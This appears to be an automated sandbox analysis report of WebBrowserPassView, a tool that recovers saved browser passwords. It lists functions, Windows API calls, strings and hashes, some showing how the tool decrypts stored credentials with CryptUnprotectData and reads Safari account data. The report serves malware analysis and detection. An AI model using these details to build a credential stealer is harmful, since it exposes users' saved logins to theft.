FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402E86

Strings

>, xrefs: 00402A91
n, xrefs: 00402C70
}, xrefs: 00402A8C
z, xrefs: 00402C80
K, xrefs: 00402B13
\, xrefs: 00402C28
^, xrefs: 00402D38
K, xrefs: 00402C58
@, xrefs: 00402C50
2, xrefs: 00402CA8
a, xrefs: 00402C06
!, xrefs: 00402C40
{, xrefs: 00402AFF
t, xrefs: 00402C48
Path, xrefs: 004029DD
com.apple.WebKit2WebProcess, xrefs: 00402D9D
&, xrefs: 00402CF8
0, xrefs: 00402B62
~, xrefs: 00402CA0
y, xrefs: 00402BA3
/, xrefs: 00402BFC
', xrefs: 00402B3B
n, xrefs: 00402CB8
t, xrefs: 00402D58
L, xrefs: 00402D20
X, xrefs: 00402D40
&, xrefs: 00402AAA
S, xrefs: 00402BF2
t, xrefs: 00402D30
F, xrefs: 00402B18
O, xrefs: 00402AE6
u, xrefs: 00402B8F
Account, xrefs: 00402A0B
y, xrefs: 00402ADC
H, xrefs: 00402A7D
h, xrefs: 00402BDF
), xrefs: 00402CD8
u, xrefs: 00402B40
=, xrefs: 00402C38
g, xrefs: 00402AB4
server, xrefs: 004029A1
q, xrefs: 00402BD5
w, xrefs: 00402BF7
H, xrefs: 00402A87
I, xrefs: 00402B4F
>, xrefs: 00402A82
com.apple.Safari, xrefs: 00402D75
`, xrefs: 00402BCB
$, xrefs: 00402CC8
8, xrefs: 00402BC6
A, xrefs: 00402AF0
#, xrefs: 00402D00
Data, xrefs: 00402A39
b, xrefs: 00402A9B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 2929817778-1134094380
Opcode ID: 995f29d439b71307d32f83be2d0feb689db9085f2827bd8da7cec9ab0f4b1b5b
Instruction ID: 5c3ec6a99a68f8aa81af4276027bb9dc61f0416e6f69787378e7b5f4b2d81055
Opcode Fuzzy Hash: 995f29d439b71307d32f83be2d0feb689db9085f2827bd8da7cec9ab0f4b1b5b
Instruction Fuzzy Hash: 07E1E56100C7C18DD332D678884978BBFD45BA7328F084B9EF1E85A2D2D7B99509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD29 Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040CD47
_wcsicmp.MSVCRT ref: 0040CD62
_wcsnicmp.MSVCRT ref: 0040CD7C
_wcsnicmp.MSVCRT ref: 0040CD90
wcslen.MSVCRT ref: 0040CDA1
_wcsicmp.MSVCRT ref: 0040CDC3
memset.MSVCRT ref: 0040CE08
wcscpy.MSVCRT ref: 0040CE15
wcslen.MSVCRT ref: 0040CE36
wcslen.MSVCRT ref: 0040CE4E
_wcsicmp.MSVCRT ref: 0040CE99
_wcsicmp.MSVCRT ref: 0040CEB2
_wcsnicmp.MSVCRT ref: 0040CEC9
memset.MSVCRT ref: 0040CF0F
wcschr.MSVCRT ref: 0040CF17
wcslen.MSVCRT ref: 0040CF1F
wcscpy.MSVCRT ref: 0040CF3D
wcschr.MSVCRT ref: 0040CF4B
_wcsnicmp.MSVCRT ref: 0040CF81
memset.MSVCRT ref: 0040CFB5
strlen.MSVCRT ref: 0040CFBB
memcpy.MSVCRT ref: 0040CFD7
strchr.MSVCRT ref: 0040CFEC
memset.MSVCRT ref: 0040D016
memset.MSVCRT ref: 0040D02B
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040D04C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040D05F

Strings

ftp://, xrefs: 0040CEC3
https://, xrefs: 0040CD8A
http://, xrefs: 0040CD76
:stringdata, xrefs: 0040CDBD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
String ID: :stringdata$ftp://$http://$https://
API String ID: 2787044678-1921111777
Opcode ID: ec0114e663ce19aff3f90003a8fd63b11b9c22cd63c360598622bef034e99d4e
Instruction ID: 31c4756266147e6910c9b81443fc6bcc098cf3ae963dfb44ea8ac31e231b8895
Opcode Fuzzy Hash: ec0114e663ce19aff3f90003a8fd63b11b9c22cd63c360598622bef034e99d4e
Instruction Fuzzy Hash: E591C571900209AEEF10EF65CC85EAF776CEF41308F11017AFD48A7181EA39ED559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00415A4F Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00415A7C
GetDlgItem.USER32 ref: 00415A88
GetWindowLongW.USER32(00000000,000000F0), ref: 00415A97
GetWindowLongW.USER32(?,000000F0), ref: 00415AA3
GetWindowLongW.USER32(00000000,000000EC), ref: 00415AAC
GetWindowLongW.USER32(?,000000EC), ref: 00415AB8
GetWindowRect.USER32 ref: 00415ACA
GetWindowRect.USER32 ref: 00415AD5
MapWindowPoints.USER32 ref: 00415AE9
MapWindowPoints.USER32 ref: 00415AF7
GetDC.USER32 ref: 00415B30
wcslen.MSVCRT ref: 00415B70
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00415B81
ReleaseDC.USER32 ref: 00415BCE
_snwprintf.MSVCRT ref: 00415C91
SetWindowTextW.USER32(?,?), ref: 00415CA5
SetWindowTextW.USER32(?,00000000), ref: 00415CC3
GetDlgItem.USER32 ref: 00415CF9
GetWindowRect.USER32 ref: 00415D09
MapWindowPoints.USER32 ref: 00415D17
GetClientRect.USER32 ref: 00415D2E
GetWindowRect.USER32 ref: 00415D38
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00415D7E
GetClientRect.USER32 ref: 00415D88
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00415DC0

Strings

EDIT, xrefs: 00415C66
STATIC, xrefs: 00415C30
%s:, xrefs: 00415C86

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 73acb0ed32a970b20df8983533c2da65e35bdd152e1489d9eefe2103cdb0831a
Instruction ID: 2a77a63511e309727bf0294579c2b04fd4d2a03fba58f863ebfb764bbd101497
Opcode Fuzzy Hash: 73acb0ed32a970b20df8983533c2da65e35bdd152e1489d9eefe2103cdb0831a
Instruction Fuzzy Hash: ACB1C075108301AFD721DFA8C985E6BBBF9FF88704F004A2DF59582261DB75E9088F56

Uniqueness

Uniqueness Score: -1.00%

Function 00403F83 Relevance: 45.1, APIs: 30, Instructions: 102windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00410381: memset.MSVCRT ref: 004103C4
Part of subcall function 00410381: memset.MSVCRT ref: 004103D9
Part of subcall function 00410381: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
Part of subcall function 00410381: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
Part of subcall function 00410381: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
Part of subcall function 00410381: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 00410498
Part of subcall function 00410381: LoadImageW.USER32 ref: 004104AA
Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
Part of subcall function 00410381: LoadImageW.USER32 ref: 004104C7
Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
Part of subcall function 00410381: GetSysColor.USER32(0000000F), ref: 004104E0

GetModuleHandleW.KERNEL32(00000000), ref: 00403F95
LoadIconW.USER32(00000000,00000072), ref: 00403FA0
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403FB1
GetModuleHandleW.KERNEL32(00000000), ref: 00403FB5
LoadIconW.USER32(00000000,00000074), ref: 00403FBA
ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403FC5
GetModuleHandleW.KERNEL32(00000000), ref: 00403FC9
LoadIconW.USER32(00000000,00000073), ref: 00403FCE
ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403FD9
GetModuleHandleW.KERNEL32(00000000), ref: 00403FDD
LoadIconW.USER32(00000000,00000075), ref: 00403FE2
ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 00403FED
GetModuleHandleW.KERNEL32(00000000), ref: 00403FF1
LoadIconW.USER32(00000000,0000006F), ref: 00403FF6
ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00404001
GetModuleHandleW.KERNEL32(00000000), ref: 00404005
LoadIconW.USER32(00000000,00000076), ref: 0040400A
ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00404015
GetModuleHandleW.KERNEL32(00000000), ref: 00404019
LoadIconW.USER32(00000000,00000077), ref: 0040401E
ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 00404029
GetModuleHandleW.KERNEL32(00000000), ref: 0040402D
LoadIconW.USER32(00000000,00000070), ref: 00404032
ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 0040403D
GetModuleHandleW.KERNEL32(00000000), ref: 00404041
LoadIconW.USER32(00000000,00000078), ref: 00404046
ImageList_ReplaceIcon.COMCTL32(?,00000008,00000000), ref: 00404051
GetModuleHandleW.KERNEL32(00000000), ref: 00404055
LoadIconW.USER32(00000000,00000079), ref: 0040405A
ImageList_ReplaceIcon.COMCTL32(?,00000009,00000000), ref: 00404065

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Icon$Image$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 264706568-0
Opcode ID: 7a8e7a753c4a6969c8ebad43a6ff4298becb11f1dffce4c04823a78b46f89c4a
Instruction ID: 4987a5fc14cceb3ec057973e66b70c09839ea495ac49043ce4cc72b72b9a55f5
Opcode Fuzzy Hash: 7a8e7a753c4a6969c8ebad43a6ff4298becb11f1dffce4c04823a78b46f89c4a
Instruction Fuzzy Hash: 46211DA0B857087AF63037B2DC4BF7B7A5EDF81B89F224410F74C990E0C9E6AC104928

Uniqueness

Uniqueness Score: -1.00%

Function 00413704 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00413749
GetDlgItem.USER32 ref: 00413761
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0041377F
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0041378B
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00413793
memset.MSVCRT ref: 004137BA
memset.MSVCRT ref: 004137DC
memset.MSVCRT ref: 004137F5
memset.MSVCRT ref: 00413809
memset.MSVCRT ref: 00413823
memset.MSVCRT ref: 00413838
GetCurrentProcess.KERNEL32 ref: 00413840
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00413863
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00413895
memset.MSVCRT ref: 004138E8
GetCurrentProcessId.KERNEL32 ref: 004138F6
memcpy.MSVCRT ref: 00413924
wcscpy.MSVCRT ref: 00413947
_snwprintf.MSVCRT ref: 004139B6
SetDlgItemTextW.USER32 ref: 004139CE
GetDlgItem.USER32 ref: 004139D8
SetFocus.USER32(00000000), ref: 004139DF

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 004139AB
{Unknown}, xrefs: 004137CE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 96155596f3279f9d03c0a9243ad5968801c4fe39fa66a488338b1dd2f38d3b4c
Instruction ID: f28911e6e9c8f7c9bcffcad48f5b4909217dcd52314a7c8ddb419c581ced49a2
Opcode Fuzzy Hash: 96155596f3279f9d03c0a9243ad5968801c4fe39fa66a488338b1dd2f38d3b4c
Instruction Fuzzy Hash: 087180B280121DFEEB11AF51DC45EEB776CEB08355F0440BAF508A2151EB799E848FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004017B0 Relevance: 39.2, APIs: 26, Instructions: 185COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00401808
ChildWindowFromPoint.USER32 ref: 0040181A
GetDlgItem.USER32 ref: 00401850
ChildWindowFromPoint.USER32 ref: 0040185D
GetDlgItem.USER32 ref: 0040188B
ChildWindowFromPoint.USER32 ref: 0040189D
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 004018A6
LoadCursorW.USER32(00000000,00000067), ref: 004018AF
SetCursor.USER32(00000000,?,?), ref: 004018B6
GetDlgItem.USER32 ref: 004018D7
ChildWindowFromPoint.USER32 ref: 004018E4
GetDlgItem.USER32 ref: 004018FE
SetBkMode.GDI32(?,00000001), ref: 0040190A
SetTextColor.GDI32(?,00C00000), ref: 00401918
GetSysColorBrush.USER32(0000000F), ref: 00401920
GetDlgItem.USER32 ref: 00401941
EndDialog.USER32(?,?), ref: 00401976
DeleteObject.GDI32(?), ref: 00401982
GetDlgItem.USER32 ref: 004019A7
ShowWindow.USER32(00000000), ref: 004019B0
GetDlgItem.USER32 ref: 004019BC
ShowWindow.USER32(00000000), ref: 004019BF
SetDlgItemTextW.USER32 ref: 004019D0
SetWindowTextW.USER32(?,00000000), ref: 004019E2
SetDlgItemTextW.USER32 ref: 004019FA
SetDlgItemTextW.USER32 ref: 00401A0B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID:
API String ID: 829165378-0
Opcode ID: 28d1f74300f5acc619f393cf0bab4760741c336622d5a51f223752340646ab01
Instruction ID: 2e860b65d83457e398c211b7ef8e3c32b9ff1fce9bb52c2d4974f341227d48e7
Opcode Fuzzy Hash: 28d1f74300f5acc619f393cf0bab4760741c336622d5a51f223752340646ab01
Instruction Fuzzy Hash: 3E519D79500708ABEB21AF70DC88E6E7BB5FB44301F10493AF552A21F1C7B9AA54DF18

Uniqueness

Uniqueness Score: -1.00%

Function 00410E8D Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 263windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D8B5: LoadMenuW.USER32 ref: 0040D8BD

SetMenu.USER32(?,00000000), ref: 00410F9A
CreateStatusWindowW.COMCTL32(50000000,0044F4CC,?,00000101), ref: 00410FB5
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00410FCD
GetModuleHandleW.KERNEL32(00000000), ref: 00410FDC
LoadImageW.USER32 ref: 00410FE9
CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 00411013
GetModuleHandleW.KERNEL32(00000000), ref: 00411020
CreateWindowExW.USER32 ref: 00411047
memcpy.MSVCRT ref: 0041110F
ShowWindow.USER32(?,?), ref: 00411145
GetFileAttributesW.KERNEL32(0045F078), ref: 00411176
GetTempPathW.KERNEL32(00000104,0045F078), ref: 00411186
RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 004111C1
SendMessageW.USER32(?,00000404,00000002,?), ref: 004111FB
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0041120E

Part of subcall function 004054CF: wcslen.MSVCRT ref: 004054EC
Part of subcall function 004054CF: SendMessageW.USER32(?,00001061,?,?), ref: 00405510

Strings

SysListView32, xrefs: 00411041
report.html, xrefs: 00411191
commdlg_FindReplace, xrefs: 004111BC
/nosaveload, xrefs: 004110CC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Message$SendWindow$Create$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpywcslen
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
API String ID: 2327787793-2103577948
Opcode ID: 777271bfed07e17862ed6d8aebfb67f85c61c800a569c266c8f994dafd1a2857
Instruction ID: 95a3d167940fe3ebdcb7c516ac7433945ec5bcbd5685e9f747196b27d1c22ec3
Opcode Fuzzy Hash: 777271bfed07e17862ed6d8aebfb67f85c61c800a569c266c8f994dafd1a2857
Instruction Fuzzy Hash: FEA1BF71640388AFEB11DF64CC89BCA3FA5AF55304F0444B9FE08AF292C7B59548CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00446665 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(0040E0C9,?,00000000), ref: 0044667B
??2@YAPAXI@Z.MSVCRT ref: 00446696
GetFileVersionInfoW.VERSION(0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466A6
VerQueryValueW.VERSION(00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466B9
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466F6
_snwprintf.MSVCRT ref: 00446716
wcscpy.MSVCRT ref: 00446740
??3@YAXPAX@Z.MSVCRT ref: 004467F0

Strings

ProductName, xrefs: 00446747
OriginalFileName, xrefs: 004467D7
CompanyName, xrefs: 00446798
LegalCopyright, xrefs: 004467C2
\VarFileInfo\Translation, xrefs: 004466F0
FileVersion, xrefs: 0044676E
FileDescription, xrefs: 00446759
ProductVersion, xrefs: 00446783
040904E4, xrefs: 0044673A
%4.4X%4.4X, xrefs: 0044670B
InternalName, xrefs: 004467AD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 92324a1f5cefa09dca78d4871894dbce6b374cfa30eaa49432ac8c724cacd97c
Instruction ID: d5653fb1b2b7478917158de9cf610de98b6740d2027696868c611b94d6ffcb81
Opcode Fuzzy Hash: 92324a1f5cefa09dca78d4871894dbce6b374cfa30eaa49432ac8c724cacd97c
Instruction Fuzzy Hash: C64113B2A00218BAD704EF91DD41DDEB7ACFF09304F11451BB905B3142EF78A659CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410381 Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004103C4
memset.MSVCRT ref: 004103D9
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410422
ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 0041042D
SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
GetModuleHandleW.KERNEL32(00000000), ref: 00410498
LoadImageW.USER32 ref: 004104AA
GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
LoadImageW.USER32 ref: 004104C7
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
GetSysColor.USER32(0000000F), ref: 004104E0
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 004104FB
ImageList_AddMasked.COMCTL32(?,?,?), ref: 0041050B
DeleteObject.GDI32(?), ref: 00410517
DeleteObject.GDI32(?), ref: 0041051D
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0041053A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d592f4ebbee006bb6ed55b3a21e33839510d47025a9d6a972f2f5b101dbbb872
Instruction ID: 7f26086368a8811bff09cc620d8db4ef3709b429c5b5910aef32137d5162c258
Opcode Fuzzy Hash: d592f4ebbee006bb6ed55b3a21e33839510d47025a9d6a972f2f5b101dbbb872
Instruction Fuzzy Hash: 84419675640304BFE720AF60DC8AFD77798FB49745F000839B799A61D1C7F6A8849B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040F696 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 185COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F6B7
memset.MSVCRT ref: 0040F6E1
memset.MSVCRT ref: 0040F6F7
memset.MSVCRT ref: 0040F70D
_snwprintf.MSVCRT ref: 0040F746
wcscpy.MSVCRT ref: 0040F791
_snwprintf.MSVCRT ref: 0040F81E
wcscat.MSVCRT ref: 0040F850

Part of subcall function 00416DB4: _snwprintf.MSVCRT ref: 00416DD8

wcscpy.MSVCRT ref: 0040F832
_snwprintf.MSVCRT ref: 0040F88F

Strings

 , xrefs: 0040F84A
<font color="%s">%s</font>, xrefs: 0040F811
bgcolor="%s", xrefs: 0040F738
nowrap, xrefs: 0040F78B
o<@, xrefs: 0040F85A, 0040F7C2, 0040F7A6
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040F6BF
</table><p>, xrefs: 0040F8B3
<table border="1" cellpadding="5">, xrefs: 0040F74E

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

